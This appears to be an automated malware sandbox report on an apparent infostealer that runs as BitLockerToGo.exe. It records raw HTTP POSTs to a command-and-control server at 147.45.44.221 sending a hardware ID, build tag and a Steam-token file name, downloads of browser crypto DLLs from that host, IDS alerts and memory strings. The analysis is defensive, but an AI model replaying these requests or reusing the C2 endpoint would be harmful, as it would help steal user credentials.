Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 147.45.44.221Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"files------FBFCAKKKFBGDGCAKFCFH--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 147.45.44.221Content-Length: 131659Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"ybncbhylepme------JECGIIIDAKJDHJKFHIEB--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGDBGDBFIJKECBAKF--
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49732 -> 147.45.44.221:80
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02756280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_02756280
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php#
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php;
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpD
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpK
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpare
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpc
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpition:
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpla
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpwser
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll4
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll8
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dllX
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/msvcp140.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dllX
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/softokn3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/sqlite3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dll6
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dllW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/c
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221KEBFB
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221b
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084293154.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: JEBFIIIE.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: JEBFIIIE.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: https://doi.org/GTB
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
